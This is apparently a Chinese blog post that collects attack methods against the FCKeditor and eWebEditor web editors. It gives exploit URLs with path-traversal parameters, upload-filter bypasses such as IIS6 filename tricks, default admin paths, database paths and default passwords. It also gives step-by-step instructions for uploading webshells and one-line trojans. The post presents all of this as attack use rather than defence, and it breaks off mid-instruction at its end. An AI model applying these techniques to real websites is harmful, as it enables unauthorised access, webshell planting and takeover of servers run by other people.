FCKeditor

FCKeditor编辑器页/查看编辑器版本/查看文件上传路径

FCKeditor编辑器页

FCKeditor/_samples/default.html  查看编辑器版本

FCKeditor/_whatsnew.html

查看文件上传路径

fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径

Note:[Hell1]截至2010年02月15日最新版本为FCKeditor v2.6.6

[Hell2]记得修改其中两处asp为FCKeditor实际使用的脚本语言

FCKeditor被动限制策略所导致的过滤不严问题

影响版本: FCKeditor x.x <= FCKeditor v2.4.3

脆弱描述：

FCKeditor

v2.4.3中File类别默认拒绝上传类型：html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

Fckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件

上传后 它保存的文件直接用的$sFilePath = $sServerDir .

$sFileName，而没有使用$sExtension为后缀

直接导致在win下在上传文件后面加个.来突破[未测试]

而在apache下，因为"Apache文件名解析缺陷漏洞"也可以利用之，详见"附录A"

另建议其他上传漏洞中定义TYPE变量时使用File类别来上传文件,根据FCKeditor的代码，其限制最为狭隘。

攻击利用:  允许其他任何后缀上传

利用2003路径解析漏洞上传网马

影响版本: 附录B

脆弱描述：

利用2003系统路径解析漏洞的原理，创建类似“bin.asp”如此一般的目录，再在此目录中上传文件即可被脚本解释器以相应脚本权限执行。

攻击利用:

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

FCKeditor PHP上传任意文件漏洞

影响版本: FCKeditor 2.2 <= FCKeditor 2.4.2

脆弱描述：

FCKeditor在处理文件上传时存在输入验证错误，远程攻击可以利用此漏洞上传任意文件。

在通过editor/filemanager/upload/php/upload.php上传文件时攻击者可以通过为Type参数定义无效的值导致上传任意脚本。

成功攻击要求config.php配置文件中启用文件上传，而默认是禁用的。

攻击利用: (请修改action字段为指定网址)：  FCKeditor 《=2.4.2

for php.html  Note:如想尝试v2.2版漏洞，则修改Type=任意值

即可，但注意，如果换回使用Media则必须大写首字母M,否则LINUX下，FCKeditor会对文件目录进行文件名校验，不会上传成功的。

TYPE自定义变量任意上传文件漏洞

影响版本: 较早版本

脆弱描述：

通过自定义Type变量的参数，可以创建或上传文件到指定的目录中去，且没有上传文件格式的限制。

攻击利用:

/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

打开这个地址就可以上传任何类型的文件了，Shell上传到的默认位置是:

http://www.heimian.com/UserFiles/all/1.asp

"Type=all"

这个变量是自定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:

/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp

网马就可以传到网站的根目录下.  Note:如找不到默认上传文件夹可检查此文件:

fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor 新闻组件遍历目录漏洞

影响版本:aspx版FCKeditor，其余版本未测试

脆弱描述：如何获得webshell请参考上文“TYPE自定义变量任意上传文件漏洞”

攻击利用:修改CurrentFolder参数使用 ../../来进入不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=aspx.asp

根据返回的XML信息可以查看网站所有的目录。

/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor中webshell的其他上传方式

影响版本:非优化/精简版本的FCKeditor

脆弱描述：

如果存在以下文件，打开后即可上传文件。

攻击利用:

fckeditor/editor/filemanager/upload/test.html

fckeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor 文件上传“.”变“_”下划线的绕过方法

影响版本: FCKeditor => 2.4.x

脆弱描述：

我们上传的文件例如：shell.php.rar或shell.php;.jpg会变为shell_php;.jpg这是新版FCK的变化。

攻击利用:  提交1.php+空格 就可以绕过去所有的,

※不过空格只支持win系统 *nix是不支持的[1.php和1.php+空格是2个不同的文件]

Note:upload/2010/3/201003102334372778.jpg

这样的格式做了过滤。也就是IIS6解析漏洞。

上传第一次。被过滤为123_asp;123.jpg 从而无法运行。

但是第2次上传同名文件123.asp;123.jpg后。由于”123_asp;123.jpg”已经存在。

文件名被命名为123.asp;123(1).jpg …… 123.asp;123(2).jpg这样的编号方式。

所以。IIS6的漏洞继续执行了。

如果通过上面的步骤进行测试没有成功，可能有以下几方面的原因：

1.FCKeditor没有开启文件上传功能，这项功能在安装FCKeditor时默认是关闭的。如果想上传文件，FCKeditor会给出错误提示。

2.网站采用了精简版的FCKeditor，精简版的FCKeditor很多功能丢失，包括文件上传功能。

3.FCKeditor的这个漏洞已经被修复。eWebEditor

eWebEditor利用基础知识

默认后台地址：/ewebeditor/admin_login.asp

建议最好检测下admin_style.asp文件是否可以直接访问

默认数据库路径：

[PATH]/db/ewebeditor.mdb

[PATH]/db/db.mdb

某些CMS里是这个数据库  也可尝试

[PATH]/db/#ewebeditor.mdb -- 某些管理员自作聪明的小伎俩

使用默认密码：admin/admin888 或 admin/admin 进入后台，也可尝试 admin/123456

(有些管理员以及一些CMS，就是这么设置的)

点击“样式管理”--可以选择新增样式，或者修改一个非系统样式，将其中图片控件所允许的上传类型后面加上|asp、|asa、|aaspsp或|cer，只要是服务器允许执行的脚本类型即可，点击“提交”并设置工具栏--将“插入图片”控件添加上。而后--预览此样式，点击插入图片，上传WEBSHELL，在“代码”模式中查看上传文件的路径。

2、当数据库被管理员修改为asp、asa后缀的时候，可以插一句话木马服务端进入数据库，然后一句话木马客户端连接拿下webshell

3、上传后无法执行？目录没权限？帅锅你回去样式管理看你编辑过的那个样式，里面可以自定义上传路径的！！！

4、设置好了上传类型，依然上传不了麽？估计是文件代码被改了，可以尝试设定“远程类型”依照6.0版本拿SHELL的方法来做(详情见下文↓)，能够设定自动保存远程文件的类型。

5、不能添加工具栏，但设定好了某样式中的文件类型，怎么办？↓这么办！

(请修改action字段)  Action.html  eWebEditor踩脚印式入侵

脆弱描述：

当我们下载数据库后查询不到密码MD5的明文时，可以去看看webeditor_style(14)这个样式表，看看是否有前辈入侵过

或许已经赋予了某控件上传脚本的能力，构造地址来上传我们自己的shell

攻击利用:

比如  ID=46  s-name =standard1  构造 代码:

ewebeditor.asp?id=content&style=standard

ID和和样式名改过后

ewebeditor.asp?id=46&style=standard1

eWebEditor遍历目录漏洞

脆弱描述：  ewebeditor/admin_uploadfile.asp

admin/upload.asp  过滤不严，造成遍历目录漏洞

攻击利用:

第一种:ewebeditor/admin_uploadfile.asp?id=14

在id=14后面添加&dir=..  再加

&dir=../..

&dir=http://www.heimian.com/../.. 看到整个网站文件了

第二种: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir

=./..

eWebEditor 5.2 列目录漏洞

脆弱描述：  ewebeditor/asp/browse.asp

过滤不严，造成遍历目录漏洞

攻击利用：

http://www.heimian.com/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..

利用WebEditor session欺骗漏洞,进入后台

脆弱描述：  漏洞文件:Admin_Private.asp

只判断了session，没有判断cookies和路径的验证问题。

攻击利用:  新建一个test.asp内容如下:

分享：

喜欢

0

赠金笔

加载中，请稍候......

评论加载中，请稍候...

发评论

登录名： 密码： 找回密码 注册记住登录状态

昵   称：

评论并转载此博文

发评论

以上网友发言只代表其个人观点，不代表新浪网的观点或立场。